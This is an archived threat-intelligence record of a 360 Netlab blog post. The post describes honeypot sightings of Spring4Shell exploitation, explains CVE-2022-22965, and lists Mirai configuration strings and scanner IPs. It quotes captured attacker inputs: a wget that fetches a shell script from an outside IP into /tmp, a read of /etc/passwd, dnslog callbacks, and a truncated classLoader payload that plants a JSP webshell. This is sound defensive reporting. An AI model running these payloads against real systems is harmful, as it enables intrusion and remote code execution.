{
	"id": "1dd6a804-4f1c-4da1-91db-ca0189dd3456",
	"created_at": "2026-04-06T00:17:36.364179Z",
	"updated_at": "2026-04-10T03:32:46.14448Z",
	"deleted_at": null,
	"sha1_hash": "b283b9e2cc26be470bb2f38271e8cf006184c28c",
	"title": "What Our Honeypot Sees Just One Day After The Spring4Shell Advisory",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 860941,
	"plain_text": "What Our Honeypot Sees Just One Day After The Spring4Shell\r\nAdvisory\r\nBy houliuyang\r\nPublished: 2022-04-01 · Archived: 2026-04-05 16:02:30 UTC\r\nBackground\r\nOn March 31, 2022, Spring issued a security advisory[1] for the Spring4Shell vulnerability (CVE-2022-22965),\r\nthis vulnerability has caused widespread concern in the security community.\r\nWhen we looked back at our data, our threat hunting honeypot System[2] had already captured activities related to\r\nthis exact vulnerability. After March 30, we started to see more attempts such as various webshells, and today,\r\n2022-04-01 11:33:09(GMT+8), less than one day after the vendor released the advisory, a variant of Mirai, has\r\nwon the race as the first botnet that adopted this vulnerability.\r\nSpring4Shell in the wild propagation\r\nOur honeypot system started to observe scans related to the Spring4Shell vulnerability (CVE-2022-22965), the\r\nfollowing diagram shows the geographic distribution of the scanner IP addresses that we have seen so far.\r\nhttps://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/\r\nPage 1 of 18\n\nTop 10 country statistics\r\nUnited States 92\r\nThe Netherlands 49\r\nGermany 30\r\nChina 21\r\nFrance 6\r\nLuxembourg 6\r\nSweden 6\r\nSwitzerland 5\r\nUkraine 5\r\nAustria 4\r\nWe haven seen a large number of Webshell and test file upload behavior, the corresponding file information is\r\nshown below.\r\nSome of the exploits that we have observed so far:\r\necho%20ddfdsfasdfasd\r\necho%20fdsafasdfasd\r\necho%202222222\r\nls\r\nls%20/tmp/\r\nwhoami\r\n%2Fbin%2Fsh%2F-c%24%7BIFS%7D%27cd%24%7BIFS%7D%2Ftmp%3Bwget%24%7BIFS%7Dhttp%3A%2F%2F107.174.133.167%2Ft.sh%24%7BI\r\ncat+/etc/passwd\r\nchdir\r\ncmd /c dir\r\ncmd /c net 
user\r\ncurl+http://111.4vcrkb.dnslog.cn/1.jpg\r\ncurl+http://12121.4vcrkb.dnslog.cn/1.jpg\r\ncurl+http://35456.4vcrkb.dnslog.cn/1.jpg\r\ndir\r\necho\r\necho 8888888888\r\necho %USERNAME%\r\necho %computername%\r\necho \u003c/xss\u003e\r\necho fucker_test_test\r\necho rinima\r\necho%20%3Csvg%20onload=confirm`xss`%3E\r\necho%20%3Csvg%20onload=confirm`xsssssss`%3E\r\necho%20ddfdsfasdfasd\r\necho%20fdsafasdfasd\r\necho%202222222\r\necho+22222\r\necho+`whoami`\r\necho+whoami\r\nexp\r\nid\r\nifconfig\r\nls\r\nls%20/tmp/\r\nping -n 2 uup0fk.dnslog.cn\r\nping uup0fk.dnslog.cn\r\nuname\r\nwhoami\r\nwhoami%0A\r\nSpring4Shell Vulnerability brief\r\nThe Spring4Shell vulnerability (CVE-2022-22965) is caused by the new module feature in JDK version 9 and above,\r\nand is a bypass of the patch for the CVE-2010-1622 vulnerability.\r\nJava Beans\r\nJava introspection manipulates JavaBean properties through reflection. The JDK provides the PropertyDescriptor\r\nclass to access JavaBean properties; when operating on multiple properties, you can operate on all of them\r\nby traversing the array of property descriptor objects.\r\nThe Introspector class is used to get the BeanInfo of an object, and the BeanInfo is then used to get the\r\nproperty descriptor PropertyDescriptor. The property descriptor gives the getter/setter methods corresponding to\r\na property, and these methods are then called through the reflection mechanism.\r\nFor example, through the PropertyDescriptor[] assignment.\r\nIf the parent class properties are not needed, the second parameter of getBeanInfo(Class beanClass, Class\r\nstopClass) is there for that purpose. When BeanInfo getBeanInfo(Class beanClass) is called directly, PropertyDescriptor[] will contain the\r\nparent class Object.class.\r\nCVE-2010-1622 Vulnerability 
brief\r\nThe CVE-2010-1622 vulnerability exists because the CachedIntrospectionResults class of Spring Beans does not specify\r\na stop class when calling java.beans.Introspector.getBeanInfo() to enumerate properties for assignment, so\r\nthe class property of the parent class (Object.class is the parent class of any Java object) can be maliciously controlled\r\nby an attacker.\r\nSpring lets the user submit a form as parameter=value pairs that are assigned to an object; for example,\r\nuser.address.street=Disclosure+Str is equivalent to frmObj.getUser().getAddress().setStreet(\"Disclosure Str.\").\r\nSo a value can be assigned to the first class property in PropertyDescriptor[] by means of\r\nuser.address.street=Disclosure+Str. If the class property is controlled through the classLoader, the exploit chain\r\ncan be constructed.\r\nVulnerability Patch\r\nSpring patches the vulnerability by adding the classLoader to the property array blacklist.\r\nCVE-2022-22965 Vulnerability brief\r\nSimilar to the CVE-2010-1622 vulnerability, this is another issue related to the class parameter.\r\nCVE-2022-22965 is a bypass of the CVE-2010-1622 patch. In the JDK11+Tomcat8.5.77+spring-webmvc5.3.17 version,\r\nwe noticed that class.module.classLoader.* can load ParallelWebappClassLoader to bypass the detection of\r\nclassLoader:\r\nExploit Payload that we saw\r\nclass.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(reque\r\nHere the pattern specifies the format of the log record, suffix specifies the log record suffix as .jsp, directory\r\nspecifies the directory webapps/ROOT where the log is saved, prefix specifies the file name tomcatwar, and\r\nfileDateFormat specifies the date format of the log file name. 
The whole payload uses Tomcat’s class\r\nAbstractAccessLogValve to modify the log storage format, directory and file name, so the webshell can be\r\nuploaded.\r\nVulnerability Patch\r\nStrict blacklist restrictions have been added.\r\nMirai botnet\r\nAs mentioned above, the Mirai botnet has jumped on the bandwagon, and the following is the relevant configuration\r\ninformation that has been decrypted.\r\n [0x01]: \"46.175.146.159\\x00\", size=15\r\n [0x02]: \"A\\x84\", size=2\r\n [0x03]: \"D\\xfd\", size=2\r\n [0x04]: \"U better back the fuck off CIANigger \u003e\u003e\u003e---\u003c3--\u003e\\x00\", size=49\r\n [0x05]: \"shell\\x00\", size=6\r\n [0x06]: \"enable\\x00\", size=7\r\n [0x07]: \"system\\x00\", size=7\r\n [0x08]: \"sh\\x00\", size=3\r\n [0x09]: \"/bin/busybox DEMONS\\x00\", size=20\r\n [0x0a]: \"DEMONS: applet not found\\x00\", size=25\r\n [0x0b]: \"ncorrect\\x00\", size=9\r\n [0x0c]: \"/bin/busybox ps\\x00\", size=16\r\n [0x0d]: \"assword\\x00\", size=8\r\n [0x0e]: \"ogin\\x00\", size=5\r\n [0x0f]: \"enter\\x00\", size=6\r\n [0x10]: \"/proc/\\x00\", size=7\r\n [0x11]: \"/exe\\x00\", size=5\r\n [0x12]: \"/fd\\x00\", size=4\r\n [0x13]: \"/maps\\x00\", size=6\r\n [0x14]: \"/proc/net/tcp\\x00\", size=14\r\n [0x15]: \"/etc/resolv.conf\\x00\", size=17\r\n [0x16]: \"nameserver\\x00\", size=11\r\n [0x17]: \"Pully\\x13SHD\\x1aiIGK\\x1cDig\\x13\\x18}Bfpc]MkGp^b\\x12[}P\\x1b\\\\~m`b`^rc\\x13Xeg\\x13G\\x1a\\x12z*\", size=57\r\n [0x18]: \"i586\\x00\", size=5\r\n [0x19]: \"i486\\x00\", size=5\r\n [0x1a]: \"x86\\x00\", size=4\r\n [0x1b]: \"i686\\x00\", size=5\r\n [0x1c]: \"mips\\x00\", size=5\r\n [0x1d]: \"mipsel\\x00\", size=7\r\n [0x1e]: \"mpsl\\x00\", size=5\r\n [0x1f]: \"sh4\\x00\", size=4\r\n [0x20]: \"superh\\x00\", size=7\r\n [0x21]: \"ppc\\x00\", size=4\r\n [0x22]: \"powerpc\\x00\", size=8\r\n [0x23]: \"spc\\x00\", size=4\r\n [0x24]: \"sparc\\x00\", 
size=6\r\n [0x25]: \"(deleted)\\x00\", size=10\r\n [0x26]: \"abcdefghijklmnopqrstuvwxyz\\x00\", size=27\r\n [0x27]: \"%d.%d.%d.%d\\x00\", size=12\r\n [0x28]: \"POST /cdn-cgi/\\x00\", size=15\r\n [0x29]: \"UPX!\\x00\", size=5\r\n [0x2a]: \"botnet\\x00\", size=7\r\n [0x2b]: \"ddos\\x00\", size=5\r\n [0x2c]: \"oginenterassword\\x00\", size=17\r\n [0x2d]: \"GET/ HTTP/1.1\\x00\", size=15\r\n [0x2e]: \"garm\\x00\", size=5\r\n [0x2f]: \"gx86\\x00\", size=5\r\n [0x30]: \"gmips\\x00\", size=6\r\n [0x31]: \"gmpsl\\x00\", size=6\r\n [0x32]: \"gsh4\\x00\", size=5\r\n [0x33]: \"gspc\\x00\", size=5\r\n [0x34]: \"gppc\\x00\", size=5\r\n [0x35]: \"gsec\\x00\", size=5\r\n [0x36]: \".glm\\x00\", size=5\r\n [0x37]: \"cronx86\\x00\", size=8\r\n [0x38]: \"cronarm\\x00\", size=8\r\n [0x39]: \"cronmips\\x00\", size=9\r\n [0x3a]: \"cronmpsl\\x00\", size=9\r\n [0x3b]: \"cronsh4\\x00\", size=8\r\n [0x3c]: \"cronspc\\x00\", size=8\r\n [0x3d]: \"cronppc\\x00\", size=8\r\n [0x3e]: \"cronsh\\x00\", size=7\r\n [0x3f]: \"gi686\\x00\", size=6\r\n [0x40]: \"/dev/watchdog\\x00\", size=14\r\n [0x41]: \"/dev/misc/watchdog\\x00\", size=19\r\n [0x42]: \"/dev/FTWDT101_watchdog\\x00\", size=23\r\n [0x43]: \"/dev/FTWDT101 watchdog\\x00\\x12\", size=24\r\n [0x44]: \"/dev/watchdog0\\x00\", size=15\r\n [0x45]: \"/etc/default/watchdog\\x00\", size=22\r\n [0x46]: \"/sbin/watchdog\\x00\", size=15\r\nSome Webshell and test files that we have seen so far\r\nfilepath count\r\n/tmp/log222.txt 3973\r\nwebapps/ROOT/log111.txt 2051\r\nwebapps/ROOT/tomcatwar.jsp 110\r\nwebapps/ROOT/wpz.jsp 27\r\n/../webapps/ROOT/logout.jsp 12\r\n./webapps/ROOT/test2%20%20.txt 9\r\nwebapps/ROOT/log101.txt 7\r\n/log_data_9.jsp 3\r\nwebapps/ROOT/xiaozhan.jsp 3\r\nwebapps/ROOT/1122.jsp 3\r\nwebapps/ROOT/0985763860781234.jsp 3\r\n/2023.jsp 3\r\nwebapps/ROOT/zhuzhuxias.jsp 3\r\nwebapps/ROOT/log147.txt 
2\r\nwebapps/ROOT/aaa69875.jsp 1\r\nwebapps/ROOT/log186.txt 1\r\nwebapps/ROOT/aaa36917.jsp 1\r\nwebapps/ROOT/member3war.jsp 1\r\nwebapps/ROOT/aaa96225.jsp 1\r\nwebapps/ROOT/log154.txt 1\r\nwebapps/ROOT/log103.txt 1\r\nwebapps/ROOT/log176.txt 1\r\nwebapps/ROOT/7FMNZ.jsp 1\r\nwebapps/ROOT/aaa28643.jsp 1\r\nwebapps/ROOT/aaa49231.jsp 1\r\nwebapps/ROOT/aaa50586.jsp 1\r\nwebapps/ROOT/log112.txt 1\r\nwebapps/ROOT/log110.txt 1\r\nwebapps/ROOT/aaa80751.jsp 1\r\n/2021.jsp 1\r\nwebapps/ROOT/aaa10854.jsp 1\r\nwebapps/ROOT/log105.txt 1\r\nwebapps/ROOT/aaa93089.jsp 1\r\nwebapps/ROOT/35456.jsp 1\r\nwebapps/ROOT/log182.txt 1\r\nwebapps/ROOT/aaa24348.jsp 1\r\nwebapps/ROOT/log131.txt 1\r\nwebapps/ROOT/indexbk.jsp 1\r\nwebapps/ROOT/log149.txt 1\r\nwebapps/ROOT/log179.txt 1\r\nwebapps/webappsbak/sxxd1648765386.txt 1\r\nwebapps/ROOT/log150.txt 1\r\nWebapps/ROOT/78754.jsp 1\r\nwebapps/ROOT/aaa24168.jsp 1\r\nwebapps/ROOT/aaa10487.jsp 1\r\nwebapps/ROOT/log178.txt 1\r\nwebapps/ROOT/lapsus 1\r\nwebapps/ROOT/zhuzhuxia.jsp 1\r\nwebapps/ROOT/log135.txt 1\r\nwebapps/ROOT/aaa40373.jsp 1\r\nwebapps/ROOT/qweasd.jsp 1\r\nwebapps/ROOT/console.jsp 1\r\nwebapps/ROOT/aaa79694.jsp 1\r\nwebapps/ROOT/aaa54378.jsp 1\r\nwebapps/ROOT/log129.txt 1\r\nwebapps/ROOT/pCJrI.jsp 1\r\nwebapps/ROOT/log162.txt 1\r\nWebapps/ROOT/7875456457.jsp 1\r\nwebapps/ROOT/.jsp 1\r\nwebapps/ROOT/log200.txt 1\r\nwebapps/ROOT/8888888888.jsp 1\r\nwebapps/ROOT/8888888888.txt 1\r\nwebapps/ROOT/log128.txt 1\r\nwebapps/ROOT/log124.txt 1\r\nwebapps/ROOT/aaa14058.jsp 1\r\nwebapps/ROOT/aaa94175.jsp 1\r\nwebapps/ROOT/conf.jsp 
1\r\nwebapps/stupidRumor_war/tomcatwar.jsp 1\r\nwebapps/ROOT/aaa83816.jsp 1\r\nRecommendations\r\nSpring users should follow the vendor’s advisory. At the same time, users can check their systems for the\r\naforementioned webshell and test file paths for signs of a possible breach.\r\nContact us\r\nReaders are always welcome to reach us on Twitter or email us at netlab at 360 dot cn.\r\nIoC List\r\nMirai C2\r\n46.175.146.159:16772\r\nSource: https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/\n\n
AS29075 IELO\n182.255.45.211 China AS6134 XNNET\n185.34.33.2 France AS28855 OCTOPUCe-AS\n185.36.81.95 Lithuania AS133398 TELe-AS\n185.38.175.130 Denmark AS205235 LABITAT\n185.38.175.131 Denmark AS205235 LABITAT\n185.56.80.65 The Netherlands AS43350 NFORCE\n185.82.126.13 Latvia AS52173 MAKONIX\n185.83.214.69 Portugal AS58110 IPVOLUME\n185.100.86.74 Finland AS200651 FlokiNET\n185.100.86.128 Finland AS200651 FlokiNET\n185.100.87.41 Romania AS200651 FlokiNET\n185.100.87.133 Romania AS200651 FlokiNET\n185.100.87.174 Romania AS200651 FlokiNET\n185.100.87.202 Romania AS200651 FlokiNET\n185.105.90.134 Russia AS205090 FIRST-SERVER-EUROPE\n185.107.47.171 The Netherlands AS43350 NFORCE\n185.107.47.215 The Netherlands AS43350 NFORCE\n  Page 14 of 18 \n\n185.107.70.56 https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/ The Netherlands AS43350 NFORCE\n185.112.147.12 Iceland AS44925 THe-1984-AS\n185.129.62.62 Denmark AS57860 ZENCURITY-NET\n185.163.119.0 Germany AS197540 netcup-AS\n185.165.171.40 Romania AS200651 FlokiNET\n185.165.171.84 Romania AS200651 FlokiNET\n185.170.114.25 Germany AS197540 netcup-AS\n185.174.101.214 United States AS8100 ASN-QUADRANET-GLOBAL\n185.220.100.240 Germany AS205100 F3NETZE\n185.220.100.241 Germany AS205100 F3NETZE\n185.220.100.242 Germany AS205100 F3NETZE\n185.220.100.243 Germany AS205100 F3NETZE\n185.220.100.244 Germany AS205100 F3NETZE\n185.220.100.245 Germany AS205100 F3NETZE\n185.220.100.246 Germany AS205100 F3NETZE\n185.220.100.247 Germany AS205100 F3NETZE\n185.220.100.248 Germany AS205100 F3NETZE\n185.220.100.249 Germany AS205100 F3NETZE\n185.220.100.250 Germany AS205100 F3NETZE\n185.220.100.251 Germany AS205100 F3NETZE\n185.220.100.252 Germany AS205100 F3NETZE\n185.220.100.253 Germany AS205100 F3NETZE\n185.220.100.254 Germany AS205100 F3NETZE\n185.220.100.255 Germany AS205100 F3NETZE\n185.220.101.6 The Netherlands AS208294 RELAYON\n185.220.101.22 The Netherlands AS208294 RELAYON\n185.220.101.32 
The Netherlands AS208294 RELAYON\n185.220.101.33 The Netherlands AS208294 RELAYON\n185.220.101.34 The Netherlands AS208294 RELAYON\n185.220.101.35 The Netherlands AS208294 RELAYON\n185.220.101.36 The Netherlands AS208294 RELAYON\n185.220.101.37 The Netherlands AS208294 RELAYON\n185.220.101.38 The Netherlands AS208294 RELAYON\n185.220.101.39 The Netherlands AS208294 RELAYON\n185.220.101.40 The Netherlands AS208294 RELAYON\n185.220.101.41 The Netherlands AS208294 RELAYON\n185.220.101.42 The Netherlands AS208294 RELAYON\n185.220.101.43 The Netherlands AS208294 RELAYON\n185.220.101.44 The Netherlands AS208294 RELAYON\n185.220.101.45 The Netherlands AS208294 RELAYON\n185.220.101.46 The Netherlands AS208294 RELAYON\n185.220.101.47 The Netherlands AS208294 RELAYON\n185.220.101.48 The Netherlands AS208294 RELAYON\n185.220.101.49 The Netherlands AS208294 RELAYON\n185.220.101.50 The Netherlands AS208294 RELAYON\n185.220.101.51 The Netherlands AS208294 RELAYON\n185.220.101.52 The Netherlands AS208294 RELAYON\n  Page 15 of 18 \n\n192.42.116.23 193.31.24.154 The Netherlands Germany AS1101 AS197540 IP-EEND-AS netcup-AS\n193.110.95.34 Switzerland AS13030 INIT7\n193.111.199.64 Germany AS24961 MYLOC-AS\n193.218.118.95 Ukraine AS207656 EPINATURA\n193.218.118.183 Ukraine AS207656 EPINATURA\n193.218.118.231 Ukraine AS207656 EPINATURA\n194.31.98.186 The Netherlands AS213035 AS-SERVERION\n194.233.77.245 Singapore AS141995 CAPL-AS-AP\n195.176.3.19 Switzerland AS559 SWITCH\n195.176.3.23 Switzerland AS559 SWITCH\n198.54.128.102 United States AS11878 TZULO\n198.98.51.189 United States AS53667 PONYNET\n198.98.57.207 United States AS53667 PONYNET\n198.144.121.43 The Netherlands AS206264 AMARUTU-TECHNOLOGY\n199.195.248.29 United States AS53667 PONYNET\n199.195.254.81 United States AS53667 PONYNET\n199.249.230.87 United States AS62744 QUINTEX\n203.175.13.118 China AS141677 NATHOSTS-AS-AP\n204.8.156.142 United States AS10961 BGP-AS\n205.185.117.149 United States AS53667 PONYNET\n205.185.124.178 
United States AS53667 PONYNET\n209.141.41.103 United States AS53667 PONYNET\n209.141.44.64 United States AS53667 PONYNET\n209.141.45.189 United States AS53667 PONYNET\n  Page 16 of 18",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/"
	],
	"report_names": [
		"what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en"
	],
	"threat_actors": [
		{
			"id": "d4b9608d-af69-43bc-a08a-38167ac6306a",
			"created_at": "2023-01-06T13:46:39.335061Z",
			"updated_at": "2026-04-10T02:00:03.291149Z",
			"deleted_at": null,
			"main_name": "LAPSUS",
			"aliases": [
				"Lapsus",
				"LAPSUS$",
				"DEV-0537",
				"SLIPPY SPIDER",
				"Strawberry Tempest",
				"UNC3661"
			],
			"source_name": "MISPGALAXY:LAPSUS",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31",
			"created_at": "2023-01-06T13:46:38.376868Z",
			"updated_at": "2026-04-10T02:00:02.949077Z",
			"deleted_at": null,
			"main_name": "Cleaver",
			"aliases": [
				"G0003",
				"Operation Cleaver",
				"Op Cleaver",
				"Tarh Andishan",
				"Alibaba",
				"TG-2889",
				"Cobalt Gypsy"
			],
			"source_name": "MISPGALAXY:Cleaver",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434656,
	"ts_updated_at": 1775791966,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b283b9e2cc26be470bb2f38271e8cf006184c28c.pdf",
		"text": "https://archive.orkl.eu/b283b9e2cc26be470bb2f38271e8cf006184c28c.txt",
		"img": "https://archive.orkl.eu/b283b9e2cc26be470bb2f38271e8cf006184c28c.jpg"
	}
}